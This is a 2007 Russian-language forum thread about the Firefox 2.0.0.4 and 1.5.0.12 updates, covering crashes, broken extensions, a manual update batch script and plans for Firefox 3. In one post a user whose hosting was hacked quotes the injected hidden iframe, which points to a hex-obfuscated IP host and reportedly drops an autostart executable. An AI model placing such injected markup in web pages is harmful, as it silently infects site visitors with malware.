31 мая, стали доступными широкой публике Firefox 1.5.0.12 и Firefox 2.0.0.4 через систему автоматических обновлений. Это стандартные обновления безопасности и стабильности. Также 1.5.0.12 является заключительной версией ветки 1.5. Firefox 1.5.0.12 уже содержит в себе улучшенных механизм обновлений, который позволит пользователям мигрировать на Firefox 2 установкой специального патча. Само обновление до ветки 2.х будет доступно в ближайшие пару недель (в настоящий момент оно тестируется).

Небольшой список изменений (на английском языке)
Особенно стоит отметить некоторые из исправлений:
#99236  Файл localstore.rdf будет автоматически удаляться при возникновении в нём ошибок
#247116 Веб-страницы дрожат/прыгают/... когда панель закладок пуста
#375710 Firefox 2.0.0.3 предлагает обновиться до версии 2.0.0.2

А так вообще в Firefox 2.0.0.4 исправлено: ~117 всего ошибок (~24 падений, ~2 утечки памяти, ~18 регрессий, ~2 связанных с приватностью и ~12 связанных с защитой.)

Русские версии:
Firefox 2.0.0.4Windows | Linux | Mac OS X |

Release Notes


Firefox 1.5.0.12Windows | Linux | Mac OS X |

Release Notes


Источник

Соответственно, те, у кого app.update.channel = beta, уже имеют последнюю версию

Ну вот и все.Кончилась 1.5

:) как только кончится эра 1.5 тутже перейду на фоксю :) самокомпиленную :)

Как в целом определяются сроки поддержки версий Firefox?
То есть, сколько еще времени будет поддерживаться 2.0? и т.д.

jtraub
Старая версия поддерживается полгода после выпуска новой. То есть Fx 2 будет поддерживаться полгода после выпуска Fx 3

То есть примерно еще год

#375710 Firefox 2.0.0.3 предлагает обновиться до версии 2.0.0.2

Это если была версия 2.0.0.3 то станет 2.0.0.2? Некислое "обновление" :D:D:D

ftp://ftp.mozilla.org/pub/mozilla.org/firefox/releases/2.0.0.4/win32/ru/

А здесь чаво?

здесь будущее :D

KOMEPC
Прямая ссылка на официальную версию 2.0.0.4. Тиражирование которой в скором времени уронит сервак.
Ну а нормальные люди подождут официальное объявление и скачают из "раздатчика" с других серверов с нормальной скоростью ;)

Нада переходить на фокс

Тут вот уже есть - <нафиг левые ссылки и рекламу других сайтов>

Ура, товарищи! :)

С нормальной скоростью? Отличная скорость! Оттуда качал только что, еще одного человека на фокс пересадил!

а я ещё вчера обновился :P

Обновился.
Полёт нормальный.

После обновления (автоматического) до 2.0.0.4 загрузилась страничка "Примечания к релизу 2.0.0.3". Косячок?

А мне кажется надо уже весточку о выходе этого релиза в новости переместить

Да, не успели ещё инфу по новому релизу выложить. Везде 2.0.0.3

Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4
Это последняя версия?

Гм, после обновления сдохли ряд важных и не очень расширений:
content preferences
images like opera
cute menus
my portal
firebug

Что то я не понимаю, в связи с чем такое могло произойти - ошибка сборщиков Suse или кривой релиз со сверх безопасностью?

Добавил ссылки на раздатчики. Собственно кому не терпелось уже обновились :)

Тему прикрепляю

Digital Mirror пишет

Гм, после обновления сдохли ряд важных и не очень расширений:
content preferences
images like opera
cute menus
my portal
firebug

Что то я не понимаю, в связи с чем такое могло произойти - ошибка сборщиков Suse или кривой релиз со сверх безопасностью?

У меня Firebug как работал, так и работает.
Ничего из почти 20 расширений не отвалилось.

У меня "отвалилось" только расширение "FirefoxMenuButtons", которое я еще со времён версии 2.0 ставлю с обходом проверки на совместимость, ибо обновлённой его версии нигде не встречал.

А так - все работает отлично.

Пит Бэнкман
Забей на это расширение. Погугли по названию расширения, найдёшь сайт, про который гугл говорит много интересного:)

Хм, пришлось создавать новый профиль, благо импорт закладок и не слишком большое количество расширений позволяют. А пароли я записываю на бумагу :)
Но малость неприятный осадок остался... Все таки странно что вылетела именно часть расширений.
Зато теперь работает лучше прежнего :) Это плюс.

Вроде ничего не вылетело. Приятный факт. :beer:

xsms накрылся,а мне его черт возьми очень нехватает:(

Нормально ли встала 1.5.0.12 ? Отпишитесь, кто нибудь?

Добавлено Птн 01 Июн 2007 06:37:22 :
Третий ФайрФокс будет работать на Виндос МЕ ?

Minor

Третий ФайрФокс будет работать на Виндос МЕ ?

Нет

Есть проблема.
Обновился до 2.0.0.4 гладко. Расширений стоит очень мало и все нормально работают. Так вот: при открытии нескольких табов фокс грузит процессор на 100 процентов, да так, что когда я кликаю на табы мышой, то ничего не происходит. Переключение между табами происходит только по нажатию комбинации клавиш ctrl+tab.
Что это может быть ?

http://www.squarefree.com/burningedge/2 … nk-builds/
Там вроде исправили что-то подобное. Или это не то?

странная штука: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru-RU; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3 - Build ID: 2007030919 не обновляется ни автоматом ни принудительным поиском обовлений. где грабли?

voden

Mozilla/5.0 (Windows; U; Windows NT 5.1; ru-RU; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3

У родных сборок не ru-RU, а ru. Локаль зашита в URL, по которому расположено обновление. Модуль проверки обновлений тычется по неправильному URL и никогда не найдёт обновление.

При экспорте лент на google.com/reader тихо падает.
Впрочем, не знаю, может и предыдущие версии падали, не экспортировал.
XP SP2
Adblock Plus 0.7.5
Add to Search Bar 1.5.2
All-in-One Sidebar 0.7
Cache Fixer 1.0
Click2Tab 0.9.43
DOM Inspector 1.8.1.4
Dr.Web anti-virus link checker 1.0.14
Extended Link Properties 1.2.3
Extended Statusbar 1.2.5
Human URL 0.1.2.1
ImgLikeOpera 0.6.15
Java Console 6.0 [DISABLED]
Mouse Gestures 1.5.2
Nightly Tester Tools 1.2.1
No Squint 1.0.0
NoScript 1.1.4.8.070425
Paste and Go 2 0.8
Resize Search Box 0.0.6
ScrapBook 1.2.0.8
Send Referer 0.3.1
Русский словарь проверки орфографии (с ё) 0.1

Баннер
В safe mode или в новом профиле падает? У меня проблем нет

меня давно мучает вопрос... а почему вся ветка FX2 представлена в виде версий 2.0.0.x?
вроде 2.5 не будет, да и 2.0.х.х не планировалось...

меня давно мучает вопрос... а почему вся ветка FX2 представлена в виде версий 2.0.0.x?

Потому что есть определённые правила составления номеров версий ПО :)

Merlyel

> Третий ФайрФокс будет работать на Виндос МЕ ?

Нет

А надо, чтоб работал.

Это будет единственное новшество в ФайрФокс 3 ?

А надо, чтоб работал.

А надо ли вообще юзать одну из самых неудачных версий Винды? Почему именно Виндоуз Миллениум нужен?

Пит Бэнкман
потому что это единственное из 9x, что у меня работало без глюков :)

ego пишет

Баннер
В safe mode или в новом профиле падает? У меня проблем нет

угу. в новом профиле не падает.

Хм... Windows ME) Даёшь FireFox под голый MS-DOS!

А надо, чтоб работал.

Надо, не надо, а уже не будет. Лишний код поудаляли. Пользуйтесь веткой 2.0.0.х

угу. в новом профиле не падает.

Значит может расширения какие конфликтуют. Не уверен точно, но попробуйте отключить адблок и потом выполнять экспорт.

потому что это единственное из 9x, что у меня работало без глюков smile

Ветка 9x - глючная по определению :) Так что лучше уже переехать на ветку NT :) А поддерживать такие старые винды... уже сама Майкософт от них отреклась. А то, что это сделала Мозилла, очень даже правильно и логично. Может, заодно подтолкнёт пользователей проапгрейдить Винду на более свежую версию... или вообще на Линукс перейти ;)

Запустил после FF2.0.0.3, IE6, из папки файрфокса вылетели dll-ки. Запустить снова нельзя.
Чудно!

vval
Это не чудно. Если пропал файл js3250.dll, то это троян.

обновил 1.5.0.7 через автообновление до 1.5.0.12. В итоге после закрытия браузера всегда выскакивает сообщение "процесс firefox.exe завершен некорректно" (или как там). :\ Откатился до 1.5.0.7.

А методом создания нового профиля и тестирования запуска на нём пользовался? Может у тебя что-то с профилем?
Кстати, а пробовал обновляться поверсионно. С 1.5.0.7 на 0.8, потом на 0.9?..

Если нет, то попробуй.
Для этого зайди сюда: http://releases.mozilla.org/pub/mozilla … x/releases
Зайди там в папку с твоей текущей версией. В ней в папку update. Там находишь название операционки своей (win32), внутри находишь язык (ru) и качаешь файл вида "firefox-1.5.0.6-1.5.0.7.partial.mar".
Потом заходишь в папку с установленным фоксом.
В нем в папку "Updates". Если нет - создаешь.
Копируеш в неё скачанный ранее файл.
Поднимаешься на папку выше (обратно в папку с установленной лисой).
Создаешь в папке файл с именем _upd.bat содержащим следующий текст.

Выделить код

Код:

@echo off
ren .\updates\*.mar update.mar
del /f/q .\updater.xml
copy .\updater.* .\updates\*.*
.\updates\updater .\updates 0
del /f/q .\updates\updater.*
type .\updates\update.log
pause

Запускаешь этот файл.

Если после того, как он отработает и выдаст кучу текста в окне внизу будет слово типа successfully и будет просить нажать любую клавишу - обновление поставилось. Если нет - проверь, не был ли запущен фокс во время обновления. Он должен быть закрыт!

Точно так же обновляешься до следующей версии, только файл _upd.bat уже создавать не надо, так-как уже будет. :)

Может хотя бы до версии 1.5.0.11 успешно обновишься... Успехов.

Dave
А HumanURL не стоит случайно?

А что, оно такой аццкий эффект может давать? У меня, кстати, установлен Locationbar2 - включает в себя функциональность хуманурла.

Lain_13
На 1.5.0.10 (кажется) оно вообще выбивало при запуске в ошибку.

Mozilla представила альфа-версию Firefox 3

Компания Mozilla представила альфа-версию нового браузера Firefox 3. Демонстрационная версия программы-обозревателя доступна для скачивания на официальном сайте Mozilla, размер дистрибутива составляет 6,2 мегабайта.

Альфа-версия новой версии Firefox, известная как Gran Paradiso Alpha 5, позиционируется как программный продукт, рассчитанный исключительно на IT-специалистов и бета-тестеров. Рядовых пользователей Firefox разработчики призывают не скачивать GP Alpha 5 и подождать релиза окончательной версии браузера.

Firefox 3 будет создан на базе нового движка Gecko 1,9. В связи с этим новая версия браузера будет неспособна работать на персональных компьютерах под управлением операционных систем Windows 95, 98 и ME, а также на Macintosh с установленными OS X 10.2 и более ранних версий. Выпуск окончательного варианта Firefox 3 намечен на осень 2007 года.

http://www.lenta.ru/news/2007/06/07/firefox/

Короче третий ФФ, отличается от второго только тем, что они выкинули поддержку кучи осей?

Браузер, а как насчет этого:

Firefox 3 будет создан на базе нового движка Gecko 1,9.

+ ликвидация дыр в безопасности + см. другие темы на форуме, посвящённые новшествам в третьей лисице.

ДЫРА В БЕЗОПАСНОСТИ!

У меня какая то сволочь ломануло ФТП на хостинг. Ну я уже все поправил, но вот что он вставлял на главной
<IFRAME src='http://0xcb.0xdf.0x9e.0x0c/t' width='6' height='6' style='visibility: hidden;'></IFRAME>
Под виндой лис виснет и вылетает. На диске C появляется файл U.exe, который создает exe в папке system32 и ставит его на автозапуск. Дальше я следить не стал и снес эту фигню. Короче, кто тут прогер, пусть разбираются.

Хimik

Короче, кто тут прогер

Тут нет программистов-разработчиков, если вы их имели ввиду. Пора бы уже запомнить. Вам в bugzill'у на английском языке баг создавать (хотя не думаю что вы будете первым, кто им это сообщит)

Пит Бэнкман

Firefox 3 будет создан на базе нового движка Gecko 1,9.

Мне, как простому пользователю, это ничего не говорит.
Вернее, говорит только то, что если куча осей не поддерживается, то это плохо.

+ ликвидация дыр в безопасности

То есть сейчас ФайрФокс опасен, и лучше им не пользоваться?

Браузер
Судя по тому, что ты до сих пор используешь Fx 1.5, на новые версии тебе наплевать. Если же я ошибаюсь, то читай:
http://www.mozilla.org/projects/firefox/3.0a1/releasenotes/
http://www.mozilla.org/projects/firefox/3.0a2/releasenotes/
http://www.mozilla.org/projects/firefox/3.0a3/releasenotes/
http://www.mozilla.org/projects/firefox/3.0a4/releasenotes/
http://www.mozilla.org/projects/firefox/3.0a5/releasenotes/
http://wiki.mozilla.org/Firefox3/Schedule

2 эээ... Браузер:
Очевидные преимущества ФФ3.
1. Резкое увеличение скорости загрузки.
2. Уменьшение объема занимаемой памяти.
3. Движок Gecko 1,9. Быстрее отрисовывает страницу, намного меньше тормозит, лучше соблюдает стандарты, проходит "пресловутый" ACiD 2 Test.
4. История, закладки, список закачек и прочий мусор теперь храниться в локальной БД SQLite. Как результат - резкое повышение скорости работы, быстрый поиск, отсутствие неоправданных тормозов при длинном списке закачек.
5. И ещё много других приятных плюшек, о которых можно почитать по ссылкам, приведенным камрадом ego.

Вернее, говорит только то, что если куча осей не поддерживается, то это плохо.

Какая такая куча? Windows 95, 98, ME и всё? Так и правильно! То, что фокс новой версии не поддерживает старых осей это не так и плохо. Ты же не винишь фокс 1.5 за то, что он не работает в Win 3.11 или 2.04? Тут та же ситуация. Винды линейки 9x морально и физически настолько устарели, что продолжать поддерживать с ними совместимость сложно и бессмысленно. Они сами по себе кривы, косы и ненадежны. Более того, эти операционки уже давно не поддерживает даже сам Микрософт. Если бы не произошел переход на библиотеку cairo (из-за которой не НТ винды были посланы подальше), то ФФ 3 был бы таким же тормозным при отрисовке страниц, как и предыдущие версии. А теперь он пользуется АППАРАТНЫМ ускорением графики!

То есть сейчас ФайрФокс опасен, и лучше им не пользоваться?

Не в этом дело. Дело в том, что скоро (если не уже) прекратиться поддержка ФФ 1.5. Т.е. при обнаружении новых багов их НИКТО не будет закрывать. И разработчиков в этом винить нельзя. Тут та же история, что и с доНТшными виндами. Там всё настолько старо, что всем уже осточертело поддерживать этот хлам в рабочем состоянии. Обновись хотя бы до ФФ 2.0.0.4. У него пока большой срок поддержки. :)
+ Некоторые дыры, видимо, невозможно исправить не внося капитальных изменений в браузер. Поэтому они будут оставатья не исправленными в старых версиях фокса. Как, например, защита от фишинга в ФФ 1.5. Её ведь там нет, не так ли? ;)

Не нарадуюсь ФФ-до этого был Ослик.Недавно начитался про Оперу и поставил.Ничего хорошего-даже нет расширения наподобие ScrapBook.А лис начинает мне нравится благодаря такой нужной фишки.Господа даешь FireFox!

Добавлено Пнд 18 Июн 2007 10:14:54 :
Не нарадуюсь ФФ-до этого был Ослик.Недавно начитался про Оперу и поставил.Ничего хорошего-даже нет расширения наподобие ScrapBook.А лис начинает мне нравится благодаря такой нужной фишки.Господа даешь FireFox!

[style= color:#990000; background-color: #000000;]Opera must die.[/style] Но... у меня Firefox ПРОСТО не работает!

Anton99
Не запускается?

Opera must die.

Давай не разжигать холиваров тут. Для таких высказываний есть соответствующий топик во флейме... Впрочем и там такое не приветствуется.

Ничего хорошего-даже нет расширения наподобие ScrapBook.

По поводу первой части утверждения я бы ещё поспорил (хотя сам терпеть О не могу за некоторые особенности), но вторая часть - откровенная неправда. Вы плохо искали. Под О есть расширение OBook... По функционалу приблизительно равняется 0,25-0,50 ScrapBook'а... Но ведь есть. :)

Тему открепляю
2.0.0.5 уже можно с официального сайта скачивать

And no more 1.5 builds...

Йопт. Обновился до 2.0.0.5 и пропали все закладк с панели закладок. Пестец.

Merlyel пишет

А HumanURL не стоит случайно?

ага, стояло. Удалил расширение - падать лиса перестала. Спасибо.

Lain_13 пишет

У меня, кстати, установлен Locationbar2 - включает в себя функциональность хуманурла.

хм.. у меня locationbar не преобразует русские символы в файлах, которые открыты локально с компьютера. Однако русские символы в интернет-страничках преобразует корректно.